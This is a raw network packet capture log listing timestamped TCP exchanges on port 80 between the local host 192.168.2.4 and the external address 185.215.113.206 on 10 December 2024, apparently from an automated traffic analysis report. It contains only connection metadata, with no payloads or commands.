Dec 10, 2024 00:42:27.323996067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.324661016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.324706078 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.324774981 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.324821949 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.325474024 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.325524092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.325655937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.325700045 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.326313019 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.326359034 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.326427937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.326477051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.327155113 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.327208996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.327280998 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.327326059 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.327989101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.328033924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.328083038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.328129053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.328820944 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.328866959 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.328947067 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.328996897 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.329664946 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.329718113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.329787016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.329840899 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.330502033 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.330563068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.330590963 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.330635071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.331445932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.331494093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.331520081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.331561089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.332117081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.332164049 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.387013912 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.387089014 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.387104988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.387151003 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.387350082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.387409925 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.387561083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.388000965 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.388056993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.388109922 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.388158083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.388820887 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.388868093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.388897896 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.388941050 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.389652014 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.389697075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.389739990 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.389785051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.390501976 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.390548944 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.390574932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.390619040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.391316891 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.391365051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.391412973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.391459942 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.392143011 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.392185926 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.392246008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.392286062 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.392977953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.393027067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.393075943 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.393117905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.393793106 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.393845081 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.393898010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.393944025 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.394622087 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.394668102 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.394726992 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.394773006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.395498037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.395555019 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.395570993 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.395612955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.396264076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.396306992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.396373034 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.396456003 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.397097111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.397146940 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.397193909 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.397260904 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.397933960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.397984982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.398040056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.398088932 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.398755074 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.398806095 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.398885012 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.398933887 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.399605036 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.399657011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.399687052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.399736881 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.400434017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.400481939 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.400527000 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.400576115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.401264906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.401309967 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.401374102 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.401420116 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.402076960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.402123928 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.402142048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.402192116 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.402925968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.402997017 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.403026104 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.403068066 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.403712988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.403760910 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.403836966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.403882980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.404689074 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.404736996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.404746056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.404787064 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.405392885 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.405440092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.405486107 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.405533075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.406222105 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.406270027 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.406338930 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.406384945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.407068968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.407119036 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.407187939 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.407237053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.407882929 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.407929897 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.408010960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.408055067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.408696890 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.408744097 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.408814907 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.408862114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.409535885 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.409617901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.409631968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.409678936 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.410370111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.410418034 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.410439014 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.410485029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.411166906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.411216021 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.505611897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.505716085 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.505765915 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.505815983 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.505958080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.506014109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.506118059 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.506164074 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.506767988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.506814003 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.506889105 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.506936073 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.507601023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.507661104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.507697105 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.507745028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.508409023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.508456945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.508519888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.508565903 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.509251118 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.509298086 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.509355068 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.509396076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.510081053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.510132074 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.510230064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.510278940 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.510916948 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.510961056 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.511065960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.511113882 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.511729002 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.511778116 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.511811018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.511854887 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.512574911 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.512645006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.512880087 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.512928009 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.513391018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.513437033 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.513524055 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.513586044 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.514218092 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.514266968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.514291048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.514333010 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.515043020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.515091896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.515162945 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.515208006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.515971899 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.516021967 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.516052961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.516103029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.516705990 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.516755104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.516804934 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.516849041 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.517644882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.517689943 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.517752886 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.517800093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.518342972 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.518388987 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.518462896 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.518508911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.519176960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.519221067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.519284964 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.519330025 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.520029068 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.520076990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.520140886 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.520186901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.520827055 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.520874977 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.520966053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.521011114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.521703959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.521754980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.521884918 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.521933079 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.522492886 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.522540092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.522588015 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.522651911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.523339987 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.523386955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.523417950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.523462057 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.524100065 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.524151087 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.579333067 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.579374075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.579405069 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.579420090 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.579673052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.579714060 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.579886913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.579931021 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.580491066 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.580533028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.580614090 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.580652952 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.581296921 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.581337929 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.581414938 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.581456900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.582145929 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.582189083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.582253933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.582298040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.583019972 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.583076954 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.583185911 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.583234072 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.583817959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.583865881 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.583923101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.583965063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.584626913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.584677935 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.584707975 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.584749937 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.585459948 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.585508108 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.585560083 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.585604906 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.586297035 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.586344957 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.586405039 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.586448908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.587122917 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.587172031 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.587228060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.587275028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.587934017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.587981939 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.588006020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.588052988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.588769913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.588815928 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.588881016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.588923931 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.589607954 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.589652061 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.589710951 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.589756966 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.590455055 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.590501070 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.590554953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.590598106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.591263056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.591308117 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.591346025 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.591392040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.592109919 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.592154980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.592221975 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.592267990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.592911959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.592957020 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.592983961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.593028069 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.593766928 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.593812943 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.593872070 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.593915939 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.594573975 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.594619989 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.594681978 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.594726086 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.595391035 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.595433950 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.595515013 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.595558882 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.596245050 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.596290112 CET	49749	80	192.168.2.4	185.215.113.206
